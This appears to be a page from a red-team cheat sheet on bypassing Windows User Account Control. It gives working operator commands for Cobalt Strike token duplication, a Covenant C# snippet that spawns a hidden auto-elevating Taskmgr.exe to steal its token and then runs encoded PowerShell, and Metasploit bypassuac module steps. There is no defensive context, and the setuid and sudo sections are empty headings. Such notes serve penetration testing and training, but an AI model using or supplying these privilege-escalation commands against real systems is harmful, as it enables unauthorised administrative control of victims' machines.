Abuse Elevation Control Mechanism

Bypass User Account Control

CS:

beacon> elevate uac-token-duplication localhost-beacon-name

Covenant:

Create a hidden instance of an auto-elevating process (e.g. Taskmgr.exe or wusa.exe) to duplicate and impersonate its token and then bypass UAC:

SharpShell /code:"var startInfo = new System.Diagnostics.ProcessStartInfo { FileName = @\"C:\Windows\System32\Taskmgr.exe\", WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden }; var taskmgr = new System.Diagnostics.Process { StartInfo = startInfo }; taskmgr.Start(); return taskmgr.Id.ToString();"
BypassUACCommand cmd.exe "/c powershell -enc <blah>"

Metasploit:

Several bypassuac modules exist under exploit/windows/local/. E.g.:

search bypassuac
use exploit/windows/local/bypassuac
set session 1
exploit

Elevated Execution with Prompt

Setuid and Setgid

Sudo and Sudo Caching

PreviousPrivilege Escalation NextAccess Token Manipulation

Last updated 4 years ago

Was this helpful?

hashtagBypass User Account Control

hashtagElevated Execution with Prompt

hashtagSetuid and Setgid

hashtagSudo and Sudo Caching

Bypass User Account Control

Elevated Execution with Prompt

Setuid and Setgid

Sudo and Sudo Caching